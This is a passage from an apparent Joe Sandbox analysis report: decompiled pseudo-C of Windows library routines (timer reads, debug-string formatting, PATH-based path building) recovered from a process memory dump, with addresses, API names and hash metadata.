				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E015D7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01688CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E015F9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E015FB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E015FCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E015D7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01688F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E015FAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x16a8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x16a862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x16a8628; // 0x0
							_t116 =  *0x16a862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                  0x015db94c
                                                  0x015db956
                                                  0x015db95c
                                                  0x015db95e
                                                  0x015db964
                                                  0x015db969
                                                  0x015db96d
                                                  0x015db96d
                                                  0x015db970
                                                  0x015db974
                                                  0x015db97a
                                                  0x015dbadf
                                                  0x015dbadf
                                                  0x015dbae2
                                                  0x015dbae4
                                                  0x015dbae6
                                                  0x015dbaf0
                                                  0x01622cb8
                                                  0x015dbaf6
                                                  0x015dbaf6
                                                  0x015dbaf6
                                                  0x015dbafd
                                                  0x015dbb1f
                                                  0x015dbb1f
                                                  0x015dbaff
                                                  0x015dbb00
                                                  0x015dbb00
                                                  0x015dbb03
                                                  0x015dbb03
                                                  0x015dbacb
                                                  0x015dbacf
                                                  0x015dbad0
                                                  0x015dbad1
                                                  0x015dbadc
                                                  0x015dbadc
                                                  0x015db980
                                                  0x015db980
                                                  0x015db988
                                                  0x015db98b
                                                  0x015db98d
                                                  0x015db990
                                                  0x015db993
                                                  0x015db999
                                                  0x015db99b
                                                  0x015db9a1
                                                  0x015db9a5
                                                  0x015db9aa
                                                  0x015db9b0
                                                  0x015db9bb
                                                  0x015db9c0
                                                  0x015db9c3
                                                  0x015db9ca
                                                  0x015db9cc
                                                  0x015db9cf
                                                  0x015db9d3
                                                  0x015db9d7
                                                  0x015dba94
                                                  0x015dba94
                                                  0x015dba98
                                                  0x015dbaa3
                                                  0x01622ccb
                                                  0x015dbaa9
                                                  0x015dbaa9
                                                  0x015dbaa9
                                                  0x015dbab1
                                                  0x01622cd5
                                                  0x01622cdd
                                                  0x01622cdd
                                                  0x015dbabb
                                                  0x015dbabc
                                                  0x015dbac2
                                                  0x015dbac3
                                                  0x015dbac3
                                                  0x015dbac6
                                                  0x00000000
                                                  0x015db9dd
                                                  0x015db9dd
                                                  0x015db9e7
                                                  0x015db9e7
                                                  0x015db9ec
                                                  0x015db9ec
                                                  0x015db9f1
                                                  0x015db9f5
                                                  0x015db9fa
                                                  0x015dba00
                                                  0x015dba0c
                                                  0x015dba10
                                                  0x015dba10
                                                  0x015dba12
                                                  0x015dba18
                                                  0x00000000
                                                  0x00000000
                                                  0x015dbb26
                                                  0x015dbb26
                                                  0x015dba1e
                                                  0x015dba1e
                                                  0x015dba23
                                                  0x015dba25
                                                  0x015dba2c
                                                  0x015dba30
                                                  0x015dba35
                                                  0x015dba35
                                                  0x015dba41
                                                  0x015dba46
                                                  0x015dba4c
                                                  0x015dba50
                                                  0x015dba54
                                                  0x015dba6a
                                                  0x015dba6e
                                                  0x015dba70
                                                  0x015dba74
                                                  0x015dba78
                                                  0x015dba7a
                                                  0x015dba7c
                                                  0x015dba8e
                                                  0x015dba90
                                                  0x015dba92
                                                  0x015dbb14
                                                  0x015dbb14
                                                  0x015dbb16
                                                  0x015dbb16
                                                  0x00000000
                                                  0x015dba7c
                                                  0x015dbb0a
                                                  0x015dbb0d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015dbb0f

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015DB9A5
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 885266447-0
                                                  • Opcode ID: 0510560c74b628d830e195ef44d3c95d9cd3bef861c5d9453dc689d58b2dfc9f
                                                  • Instruction ID: 0a8817bfc60710f797e296ef0959a6aca2f1e77a12a78f6c989bd51547876507
                                                  • Opcode Fuzzy Hash: 0510560c74b628d830e195ef44d3c95d9cd3bef861c5d9453dc689d58b2dfc9f
                                                  • Instruction Fuzzy Hash: BF515771A08341CFD730DF2DC48092ABBEAFB89640F56896EF6858B345D771E840CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015BB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E015BB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x168f7a8);
				E0160D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0160D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E015FD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E015FF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0160DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E015FB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E015FB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E015FE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E015FA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                  0x015bb171
                                                  0x015bb171
                                                  0x015bb171
                                                  0x015bb171
                                                  0x015bb171
                                                  0x015bb176
                                                  0x015bb17b
                                                  0x015bb180
                                                  0x015bb186
                                                  0x015bb18f
                                                  0x015bb198
                                                  0x015bb1a4
                                                  0x015bb1aa
                                                  0x01614802
                                                  0x01614802
                                                  0x01614805
                                                  0x0161480c
                                                  0x0161480e
                                                  0x015bb1d1
                                                  0x015bb1d3
                                                  0x015bb1de
                                                  0x015bb1de
                                                  0x01614817
                                                  0x0161481e
                                                  0x01614820
                                                  0x01614822
                                                  0x01614822
                                                  0x01614824
                                                  0x01614824
                                                  0x0161482a
                                                  0x00000000
                                                  0x00000000
                                                  0x01614835
                                                  0x0161483a
                                                  0x0161483d
                                                  0x0161483f
                                                  0x01614842
                                                  0x01614842
                                                  0x01614842
                                                  0x01614846
                                                  0x0161484c
                                                  0x0161484e
                                                  0x01614851
                                                  0x01614851
                                                  0x01614853
                                                  0x01614854
                                                  0x01614854
                                                  0x01614858
                                                  0x0161485a
                                                  0x0161485a
                                                  0x0161485d
                                                  0x0161485f
                                                  0x01614861
                                                  0x01614861
                                                  0x01614866
                                                  0x0161486b
                                                  0x0161486e
                                                  0x01614871
                                                  0x01614876
                                                  0x01614876
                                                  0x01614878
                                                  0x0161487b
                                                  0x01614884
                                                  0x01614884
                                                  0x00000000
                                                  0x0161487d
                                                  0x0161487d
                                                  0x01614882
                                                  0x01614889
                                                  0x01614889
                                                  0x0161488f
                                                  0x01614891
                                                  0x016148e0
                                                  0x016148e2
                                                  0x016148e4
                                                  0x016148e4
                                                  0x016148e7
                                                  0x016148e7
                                                  0x016148ed
                                                  0x016148f4
                                                  0x016148f6
                                                  0x01614951
                                                  0x01614951
                                                  0x01614953
                                                  0x01614953
                                                  0x01614956
                                                  0x01614956
                                                  0x01614958
                                                  0x01614959
                                                  0x01614959
                                                  0x0161495d
                                                  0x0161495d
                                                  0x0161495f
                                                  0x0161495f
                                                  0x01614965
                                                  0x01614969
                                                  0x016149ba
                                                  0x016149ba
                                                  0x016149c1
                                                  0x016149c5
                                                  0x016149cc
                                                  0x016149d4
                                                  0x016149d7
                                                  0x016149da
                                                  0x016149e4
                                                  0x016149e5
                                                  0x016149f3
                                                  0x01614a02
                                                  0x00000000
                                                  0x01614a02
                                                  0x01614972
                                                  0x01614974
                                                  0x00000000
                                                  0x00000000
                                                  0x01614976
                                                  0x01614979
                                                  0x01614982
                                                  0x01614983
                                                  0x01614984
                                                  0x0161498b
                                                  0x0161498d
                                                  0x01614991
                                                  0x01614993
                                                  0x01614999
                                                  0x0161499d
                                                  0x016149a2
                                                  0x016149a2
                                                  0x016149a2
                                                  0x01614999
                                                  0x016149ac
                                                  0x00000000
                                                  0x016149b3
                                                  0x016148f8
                                                  0x016148fe
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x016148fe
                                                  0x01614895
                                                  0x0161489c
                                                  0x016148ad
                                                  0x016148b2
                                                  0x016148b5
                                                  0x016148b7
                                                  0x016148ba
                                                  0x016148bc
                                                  0x016148c6
                                                  0x016148c6
                                                  0x016148cb
                                                  0x016148d1
                                                  0x016148d4
                                                  0x016148d8
                                                  0x016148d8
                                                  0x00000000
                                                  0x016148d8
                                                  0x016148be
                                                  0x016148c0
                                                  0x00000000
                                                  0x00000000
                                                  0x016148c2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x016148c4
                                                  0x00000000
                                                  0x01614882
                                                  0x0161487b
                                                  0x01614904
                                                  0x01614906
                                                  0x00000000
                                                  0x00000000
                                                  0x01614908
                                                  0x0161490e
                                                  0x00000000
                                                  0x00000000
                                                  0x01614910
                                                  0x01614917
                                                  0x01614917
                                                  0x00000000
                                                  0x01614917
                                                  0x015bb1ba
                                                  0x016147f9
                                                  0x016147fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x016147fc
                                                  0x015bb1c0
                                                  0x015bb1c0
                                                  0x015bb1c3
                                                  0x015bb1cb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: _vswprintf_s
                                                  • String ID:
                                                  • API String ID: 677850445-0
                                                  • Opcode ID: 56d5873f9e6ebe45a07bb4cbd1006ab511fe513b38612edbbc790e2febacd447
                                                  • Instruction ID: e34c714b67794672a7a9d45090accff6f3a433d54ccae3f690f500948567ee54
                                                  • Opcode Fuzzy Hash: 56d5873f9e6ebe45a07bb4cbd1006ab511fe513b38612edbbc790e2febacd447
                                                  • Instruction Fuzzy Hash: 2851D271D0025A8EEB35CF68CC45BAEBBB1BF04710F1942ADD959AB386DB708941CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E2581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 81%
                                                  			E015E2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t242;
				signed int _t246;
				void* _t247;
				signed int _t254;
				signed int _t256;
				intOrPtr _t258;
				signed int _t261;
				signed int _t268;
				signed int _t271;
				signed int _t279;
				intOrPtr _t285;
				signed int _t287;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				unsigned int _t295;
				signed int _t299;
				signed int _t301;
				signed int _t305;
				intOrPtr _t317;
				signed int _t326;
				signed int _t328;
				signed int _t329;
				signed int _t334;
				signed int _t336;
				void* _t337;
				intOrPtr* _t339;
				void* _t340;
				void* _t341;
				intOrPtr* _t343;
				void* _t346;
				signed int _t347;
				signed int _t349;
				signed int _t352;
				signed int _t353;
				void* _t355;
				void* _t356;

				_t349 = _t352;
				_t353 = _t352 - 0x4c;
				_v8 =  *0x16ad360 ^ _t349;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t295 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t356 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t285 = 0x48;
				_t315 = 0 | _t356 == 0x00000000;
				_t326 = 0;
				_v37 = _t356 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t285 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t334 = 0xc0000106;
						goto L32;
					} else {
						_t336 = L015D4620(_t295,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t285);
						_v52 = _t336;
						__eflags = _t336;
						if(_t336 == 0) {
							_t334 = 0xc0000017;
							goto L32;
						} else {
							 *(_t336 + 0x44) =  *(_t336 + 0x44) & 0x00000000;
							_t50 = _t336 + 0x48; // 0x48
							_t328 = _t50;
							_t315 = _v32;
							 *((intOrPtr*)(_t336 + 0x3c)) = _t285;
							_t287 = 0;
							 *((short*)(_t336 + 0x30)) = _v48;
							__eflags = _t315;
							if(_t315 != 0) {
								 *(_t336 + 0x18) = _t328;
								__eflags = _t315 - 0x16a8478;
								 *_t336 = ((0 | _t315 == 0x016a8478) - 0x00000001 & 0xfffffffb) + 7;
								E015FF3E0(_t328,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
								_t315 = _v32;
								_t353 = _t353 + 0xc;
								_t287 = 1;
								__eflags = _a8;
								_t328 = _t328 + (( *_t315 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t279 = E016439F2(_t328);
									_t315 = _v32;
									_t328 = _t279;
								}
							}
							_t299 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t334 = _v68;
								__eflags = 0;
								 *((short*)(_t328 - 2)) = 0;
								goto L32;
							} else {
								_t289 = _t336 + _t287 * 4;
								_v56 = _t289;
								do {
									__eflags = _t315;
									if(_t315 != 0) {
										_t242 =  *(_v60 + _t299 * 4);
										__eflags = _t242;
										if(_t242 == 0) {
											goto L30;
										} else {
											__eflags = _t242 == 5;
											if(_t242 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t289 =  *(_v60 + _t299 * 4);
										 *(_t289 + 0x18) = _t328;
										_t246 =  *(_v60 + _t299 * 4);
										__eflags = _t246 - 8;
										if(_t246 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t246 * 4 +  &M015E2959))) {
												case 0:
													__ax =  *0x16a8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E015FF3E0(__edi,  *0x16a848c, __ax & 0x0000ffff);
														__eax =  *0x16a8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E015FF3E0(_t328, _v80, _v64);
													_t274 = _v64;
													goto L26;
												case 2:
													 *0x16a8480 & 0x0000ffff = E015FF3E0(__edi,  *0x16a8484,  *0x16a8480 & 0x0000ffff);
													__eax =  *0x16a8480 & 0x0000ffff;
													__eax = ( *0x16a8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E015FF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E015FF3E0(_t328, _v76, _v36);
														_t274 = _v36;
													}
													L26:
													_t353 = _t353 + 0xc;
													_t328 = _t328 + (_t274 >> 1) * 2 + 2;
													__eflags = _t328;
													L27:
													_push(0x3b);
													_pop(_t276);
													 *((short*)(_t328 - 2)) = _t276;
													goto L28;
												case 6:
													__ebx = "\\W:w\\W:w";
													__eflags = __ebx - "\\W:w\\W:w";
													if(__ebx != "\\W:w\\W:w") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E015FF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\W:w\\W:w";
														} while (__ebx != "\\W:w\\W:w");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x16a8478 & 0x0000ffff = E015FF3E0(__edi,  *0x16a847c,  *0x16a8478 & 0x0000ffff);
													__eax =  *0x16a8478 & 0x0000ffff;
													__eax = ( *0x16a8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E016439F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x16a6e58 & 0x0000ffff = E015FF3E0(__edi,  *0x16a6e5c,  *0x16a6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x16a6e58 & 0x0000ffff;
													__eax = ( *0x16a6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t299 = _v16;
													_t315 = _v32;
													L29:
													_t289 = _t289 + 4;
													__eflags = _t289;
													_v56 = _t289;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t299 = _t299 + 1;
									_v16 = _t299;
									__eflags = _t299 - _v48;
								} while (_t299 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t246 =  *(_v60 + _t326 * 4);
						if(_t246 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t246 * 4 +  &M015E2935))) {
							case 0:
								__ax =  *0x16a8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t315 =  &_v64;
								_v80 = E015E2E3E(0,  &_v64);
								_t285 = _t285 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x16a8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x16a8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E015CEEF0(0x16a79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E015CEB70(__ecx, 0x16a79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t220 = _v72;
											__eflags = _t220;
											if(_t220 != 0) {
												L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t220);
											}
											_t221 = _v52;
											__eflags = _t221;
											if(_t221 != 0) {
												__eflags = _t334;
												if(_t334 < 0) {
													L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t221);
													_t221 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t295 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x16a7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L015D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E015CEB70(__ecx, 0x16a79a0);
										__eax = _v52;
										L36:
										_pop(_t327);
										_pop(_t335);
										__eflags = _v8 ^ _t349;
										_pop(_t286);
										return E015FB640(_t221, _t286, _v8 ^ _t349, _t315, _t327, _t335);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
